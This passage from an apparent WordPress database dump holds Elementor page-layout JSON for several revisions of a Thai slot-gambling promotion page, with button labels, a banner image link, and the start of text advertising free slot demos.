\\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_motion_fx_mouse\":\"yes\",\"_animation\":\"bounce\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(602,92,'_thumbnail_id','61'),(606,93,'_elementor_edit_mode','builder'),(607,93,'_elementor_template_type','wp-page'),(608,93,'_elementor_version','3.32.5'),(609,93,'_elementor_pro_version','3.32.3'),(610,93,'_wp_page_template','default'),(611,93,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(612,93,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(613,93,'_thumbnail_id','61'),(619,94,'_elementor_edit_mode','builder'),(620,94,'_elementor_template_type','wp-page'),(621,94,'_elementor_version','3.32.5'),(622,94,'_elementor_pro_version','3.32.3'),(623,94,'_wp_page_template','default'),(624,94,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(625,94,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(626,94,'_thumbnail_id','61'),(629,95,'_elementor_edit_mode','builder'),(630,95,'_elementor_template_type','wp-page'),(631,95,'_elementor_version','3.32.5'),(632,95,'_elementor_pro_version','3.32.3'),(633,95,'_wp_page_template','default'),(634,95,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(635,95,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(636,95,'_thumbnail_id','61'),(639,96,'_elementor_edit_mode','builder'),(640,96,'_elementor_template_type','wp-page'),(641,96,'_elementor_version','3.32.5'),(642,96,'_elementor_pro_version','3.32.3'),(643,96,'_wp_page_template','default'),(644,96,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(645,96,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(646,96,'_thumbnail_id','61'),(651,97,'_elementor_edit_mode','builder'),(652,97,'_elementor_template_type','wp-page'),(653,97,'_elementor_version','3.32.5'),(654,97,'_elementor_pro_version','3.32.3'),(655,97,'_wp_page_template','default'),(656,97,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(657,97,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(658,97,'_thumbnail_id','61'),(661,98,'_elementor_edit_mode','builder'),(662,98,'_elementor_template_type','wp-page'),(663,98,'_elementor_version','3.32.5'),(664,98,'_elementor_pro_version','3.32.3'),(665,98,'_wp_page_template','default'),(666,98,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(667,98,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(668,98,'_thumbnail_id','61'),(671,99,'_elementor_edit_mode','builder'),(672,99,'_elementor_template_type','wp-page'),(673,99,'_elementor_version','3.32.5'),(674,99,'_elementor_pro_version','3.32.3'),(675,99,'_wp_page_template','default'),(676,99,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(677,99,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d 